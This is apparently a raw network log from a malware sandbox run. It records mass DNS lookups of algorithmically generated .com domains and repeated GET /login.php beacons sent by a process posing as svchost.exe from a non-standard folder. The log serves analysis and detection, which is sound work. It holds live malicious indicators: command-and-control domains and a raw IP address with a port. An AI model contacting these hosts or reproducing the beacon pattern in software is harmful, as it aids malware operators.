                                                                                                                                                                                                              Nov 11, 2024 18:34:13.515499115 CET1.1.1.1192.168.2.80xa5c6Name error (3)vojyqac.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.516892910 CET1.1.1.1192.168.2.80x1898Name error (3)gatyfuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.530642033 CET1.1.1.1192.168.2.80x249aName error (3)qedyfyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.546277046 CET1.1.1.1192.168.2.80x55beName error (3)qebytuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.549870968 CET1.1.1.1192.168.2.80x4adName error (3)lysynun.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.550940990 CET1.1.1.1192.168.2.80x65dfName error (3)puzylyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.335169077 CET1.1.1.1192.168.2.80x3f0eName error (3)galynus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.340974092 CET1.1.1.1192.168.2.80xb0a0Name error (3)lymylen.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.354466915 CET1.1.1.1192.168.2.80x37deName error (3)vonykam.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.360426903 CET1.1.1.1192.168.2.80xe393Name error (3)qekynyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.368864059 CET1.1.1.1192.168.2.80xaf85Name error (3)gatypuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.377546072 CET1.1.1.1192.168.2.80x3e4aName error (3)vopyput.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.380773067 CET1.1.1.1192.168.2.80xab64Name error (3)lyvyjoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.380949974 CET1.1.1.1192.168.2.80x98bName error (3)qebykoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.383208990 CET1.1.1.1192.168.2.80x97deName error (3)ganykah.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.386529922 CET1.1.1.1192.168.2.80xe14cName error (3)qedysol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.387260914 CET1.1.1.1192.168.2.80x53f7Name error (3)qexynyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.387466908 CET1.1.1.1192.168.2.80x7aaaName error (3)volymuc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.393543005 CET1.1.1.1192.168.2.80xb590Name error (3)vowykat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.394503117 CET1.1.1.1192.168.2.80x9583Name error (3)lysysir.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.395294905 CET1.1.1.1192.168.2.80xf188Name error (3)pupypil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.395941973 CET1.1.1.1192.168.2.80x7c14Name error (3)lykynyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.398308992 CET1.1.1.1192.168.2.80x226Name error (3)pujybev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.406182051 CET1.1.1.1192.168.2.80xc36dName error (3)lyryler.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.406620979 CET1.1.1.1192.168.2.80x67e6Name error (3)vocymum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.407735109 CET1.1.1.1192.168.2.80xec30Name error (3)gahydos.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.411870956 CET1.1.1.1192.168.2.80x78caName error (3)pumyleg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.413085938 CET1.1.1.1192.168.2.80x37dcName error (3)lygysid.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.419625998 CET1.1.1.1192.168.2.80x94b3Name error (3)lyvymun.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.419881105 CET1.1.1.1192.168.2.80x9b76Name error (3)gatyzyw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.419889927 CET1.1.1.1192.168.2.80x88b9Name error (3)purylal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.419893980 CET1.1.1.1192.168.2.80x4f79Name error (3)vojydoc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.420840979 CET1.1.1.1192.168.2.80x6e70Name error (3)qetylel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.421243906 CET1.1.1.1192.168.2.80xe4faName error (3)pujydap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.421253920 CET1.1.1.1192.168.2.80x5e0aName error (3)pufypuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.427864075 CET1.1.1.1192.168.2.80x8a68Name error (3)puvymug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.428654909 CET1.1.1.1192.168.2.80x2b08Name error (3)qegysiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.440943956 CET1.1.1.1192.168.2.80x996cName error (3)gacynyh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.442979097 CET1.1.1.1192.168.2.80xf0f7Name error (3)qegyvag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.443612099 CET1.1.1.1192.168.2.80x9ab0Name error (3)vopyzyk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.444292068 CET1.1.1.1192.168.2.80xc82bName error (3)lykyfax.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.451111078 CET1.1.1.1192.168.2.80xb37dName error (3)gahyvab.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.451397896 CET1.1.1.1192.168.2.80x7b21Name error (3)puvyjiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.452339888 CET1.1.1.1192.168.2.80x4087Name error (3)qetytup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.456809998 CET1.1.1.1192.168.2.80x61d5Name error (3)vocyjik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.457530975 CET1.1.1.1192.168.2.80xea6bName error (3)vojybef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.469537020 CET1.1.1.1192.168.2.80x404eName error (3)purytyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.472790003 CET1.1.1.1192.168.2.80x7c0aName error (3)lyrytyx.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.476380110 CET1.1.1.1192.168.2.80x81baName error (3)pupyxuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.477817059 CET1.1.1.1192.168.2.80x6db8Name error (3)vowyrec.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.478132010 CET1.1.1.1192.168.2.80x511cName error (3)pufycog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.478142977 CET1.1.1.1192.168.2.80xc9b6Name error (3)puzygyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.478307962 CET1.1.1.1192.168.2.80xcdeName error (3)vofycim.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.478532076 CET1.1.1.1192.168.2.80x42b3Name error (3)ganyqib.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.481940985 CET1.1.1.1192.168.2.80xf8daName error (3)qekyfep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.496309042 CET1.1.1.1192.168.2.80x3bc4Name error (3)lygyvon.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.498480082 CET1.1.1.1192.168.2.80x7d14Name error (3)gacyhuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.499207020 CET1.1.1.1192.168.2.80x6350Name error (3)pumywov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.501884937 CET1.1.1.1192.168.2.80x81eName error (3)qeqyrav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.725070000 CET1.1.1.1192.168.2.80x632fName error (3)vonyqof.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.725409985 CET1.1.1.1192.168.2.80xc268Name error (3)gaqyres.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.725419998 CET1.1.1.1192.168.2.80x2f00Name error (3)lyxygur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.746262074 CET1.1.1.1192.168.2.80xdcaName error (3)galyfez.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.102197886 CET1.1.1.1192.168.2.80x7b6dName error (3)qedyxuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.102468967 CET1.1.1.1192.168.2.80x53ddName error (3)lymywad.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.102480888 CET1.1.1.1192.168.2.80x1722Name error (3)volygyt.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.102490902 CET1.1.1.1192.168.2.80xd4a1Name error (3)qexyhul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.104803085 CET1.1.1.1192.168.2.80xcc85Name error (3)gadycih.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.111387014 CET1.1.1.1192.168.2.80x9873Name error (3)lysyxuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.440197945 CET1.1.1.1192.168.2.80xca59Name error (3)vofypuf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.440316916 CET1.1.1.1192.168.2.80xb36aName error (3)gaqykoz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.444266081 CET1.1.1.1192.168.2.80x3015Name error (3)puzybeq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.445005894 CET1.1.1.1192.168.2.80xc7eName error (3)qeqykop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.447192907 CET1.1.1.1192.168.2.80x149Name error (3)gadypub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.451675892 CET1.1.1.1192.168.2.80x98e9Name error (3)vowyqik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.451685905 CET1.1.1.1192.168.2.80xfddaName error (3)volybak.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.451697111 CET1.1.1.1192.168.2.80x46f3Name error (3)lygyxux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.451708078 CET1.1.1.1192.168.2.80x7c8eName error (3)qexyfag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.452982903 CET1.1.1.1192.168.2.80x1252Name error (3)puzydog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.454585075 CET1.1.1.1192.168.2.80x21adName error (3)vofyzyc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.462398052 CET1.1.1.1192.168.2.80xf55fName error (3)lyxynej.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.466084957 CET1.1.1.1192.168.2.80xcd48Name error (3)lyxyfan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.466135025 CET1.1.1.1192.168.2.80xf738Name error (3)gaqyqiw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.469567060 CET1.1.1.1192.168.2.80x7ad9Name error (3)lymyjix.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.469772100 CET1.1.1.1192.168.2.80xaedeName error (3)qedytyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.474808931 CET1.1.1.1192.168.2.80x844fName error (3)lyrywoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.476383924 CET1.1.1.1192.168.2.80x588fName error (3)vocygef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.480489969 CET1.1.1.1192.168.2.80x73a0Name error (3)qegyxup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.480940104 CET1.1.1.1192.168.2.80x20afName error (3)qeqyqul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.485008955 CET1.1.1.1192.168.2.80x34b2Name error (3)gacyfeb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                • lyrysor.com
                                                                                                                                                                                                                • 106.15.232.163:8000
                                                                                                                                                                                                                • qexyhuv.com
                                                                                                                                                                                                                • galynuh.com
                                                                                                                                                                                                                • vofycot.com
                                                                                                                                                                                                                • lyxynyx.com
                                                                                                                                                                                                                • qegyval.com
                                                                                                                                                                                                                • gadyciz.com
                                                                                                                                                                                                                • ww16.vofycot.com
                                                                                                                                                                                                                • ww25.lyxynyx.com
                                                                                                                                                                                                                • qetyhyg.com
                                                                                                                                                                                                                • gatyhub.com
                                                                                                                                                                                                                • lygyvuj.com
                                                                                                                                                                                                                • gahyhiz.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49707 | 162.255.119.102 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:08.359447002 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gahyqah.com
Nov 11, 2024 18:33:08.912132978 CET | 303 | IN | HTTP/1.1 302 Found
Date: Mon, 11 Nov 2024 17:33:08 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 55
Connection: keep-alive
Location: http://www.gahyqah.com/login.php
X-Served-By: Namecheap URL Forward
Server: namecheap-nginx
Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49708 | 3.94.10.34 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:08.365611076 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lymyxid.com
Nov 11, 2024 18:33:08.793668985 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 17:33:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=fc1b6c412396387aa1fbc86a7deece62|66.23.206.109|1731346388|1731346388|0|1|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49709 | 199.191.50.83 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:08.366271973 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galyqaz.com
Nov 11, 2024 18:33:10.653331041 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 17:33:08 GMT
Server: Apache
Referrer-Policy: no-referrer-when-downgrade
Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
Set-Cookie: vsid=903vr478891988923922560; expires=Sat, 10-Nov-2029 17:33:08 GMT; Max-Age=157680000; path=/; domain=galyqaz.com; HttpOnly
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49710 | 208.100.26.245 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:08.366569042 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyvyxor.com
Nov 11, 2024 18:33:08.813263893 CET | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 11 Nov 2024 17:33:08 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:33:08.814102888 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyvyxor.com
Nov 11, 2024 18:33:08.918771029 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:08 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:33:33.986737013 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyvyxor.com
Nov 11, 2024 18:33:34.095405102 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:34 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:33:34.110724926 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyvyxor.com
Nov 11, 2024 18:33:34.214591026 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:34 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49712 | 188.114.96.3 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:08.373912096 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
Nov 11, 2024 18:33:09.085290909 CET | 972 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:09 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://qegyhig.com/login.php
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XRA%2BgwhV4F9Fqc5ZuflR2qwFfQfMEb5vTKOiXtFSBjHHN%2Fwc8mQhHJZaszUf4DRyNNd60Dcygth7xNTb7B%2BEXSIpckFgo%2BvzGv8vxQJ0b3uveMFVILX9YL%2B48mEIVw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e1006919e70c468-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1237&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:33:10.826864958 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
Nov 11, 2024 18:33:11.171658993 CET | 801 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:11 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://qegyhig.com/login.php
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3t5qt8ilksvyniCveZ1PXS%2F3HMyU6F2FPu55sQjfioMb0m%2FoQpk62xB4PzZ7eFHTcupRFCjbUnxjCwsswfp0UJ58H2Mz2Kar1vx62VW1i94l5dStQoytAeC1rQlYXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e10069eec26c468-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1241&sent=4&recv=6&lost=0&retrans=0&sent_bytes=972&recv_bytes=486&delivery_rate=2202281&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Nov 11, 2024 18:33:11.176244020 CET | 173 | IN |
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
